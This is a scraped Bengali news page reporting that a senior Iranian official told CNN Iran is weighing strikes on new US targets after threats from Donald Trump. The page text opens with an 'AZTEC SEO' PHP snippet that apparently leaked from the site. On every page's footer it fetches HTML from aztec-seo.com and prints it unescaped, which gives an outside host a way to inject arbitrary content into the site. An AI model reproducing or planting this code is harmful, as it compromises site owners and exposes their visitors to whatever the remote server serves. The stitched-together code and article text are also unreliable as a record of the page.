/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); হামলা চালানোর জন্য যুক্তরাষ্ট্রের নতুন স্থাপনা খুঁজছে ইরান | Dhaka Sky News

মির্জা আব্বাসের মানহানির অভিযোগে নাসীরুদ্দীন পাটওয়ারীর বিরুদ্ধে মামলার আবেদন

আগের সংবাদ

গাইবান্ধায় গর্ভবতী স্ত্রীর পেটে লাথি মেরে গর্ভের সন্তান হত্যা: প্রধান আসামি গ্রেফতার

পরের সংবাদ

হামলা চালানোর জন্য যুক্তরাষ্ট্রের নতুন স্থাপনা খুঁজছে ইরান

অনলাইন ডেস্ক

প্রকাশিত: March 8, 2026 , 5:54 pm

 

মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের হুমকির জবাবে ইরান যুক্তরাষ্ট্রের নতুন সামরিক সম্পদ বা স্থাপনায় হামলা চালানোর বিষয়টি খতিয়ে দেখছে বলে জানিয়েছেন একজন জ্যেষ্ঠ ইরানি কর্মকর্তা।
তিনি সিএনএনকে জানান, ট্রাম্প শনিবার ইরানকে ‘খুব কঠোরভাবে আঘাত করা হবে’ বলে সতর্ক করার পর ইরান এই পদক্ষেপ বিবেচনা করছে।
ট্রাম্প ইরানে ‘সম্পূর্ণ ধ্বংস ও নিশ্চিত মৃত্যু’ ঘটাতে পারে—এমন নতুন লক্ষ্যবস্তু বিবেচনার কথা বলার কিছুক্ষণ পরই ওই কর্মকর্তা বলেন, যুক্তরাষ্ট্র স্পষ্টভাবেই ‘ইরানি জনগণের বিরুদ্ধে যুদ্ধ বিস্তারের এবং সরাসরি তাদের হত্যা করার’ হুমকি দিয়েছে।
তিনি বলেন, ‘এই কারণে ইসলামী প্রজাতন্ত্র ঘোষণা করছে যে— যেসব মার্কিন অঞ্চল, বাহিনী ও সংশ্লিষ্ট পক্ষ এখনো ইরানি সশস্ত্র বাহিনীর টার্গেট তালিকায় অন্তর্ভুক্ত হয়নি, সেগুলো গুরুত্বসহকারে পর্যালোচনা করা হবে। শত্রুপক্ষ যদি অবিবেচনাপ্রসূত কোনো পদক্ষেপ নেয়, তাহলে তাদের বিরুদ্ধে ব্যবস্থা নেওয়া হবে।’
তবে ওই কর্মকর্তা এ বিষয়ে আর কোনো বিস্তারিত তথ্য দেননি এবং নতুন লক্ষ্যবস্তুতে হামলা কবে শুরু হতে পারে তা-ও উল্লেখ করেননি।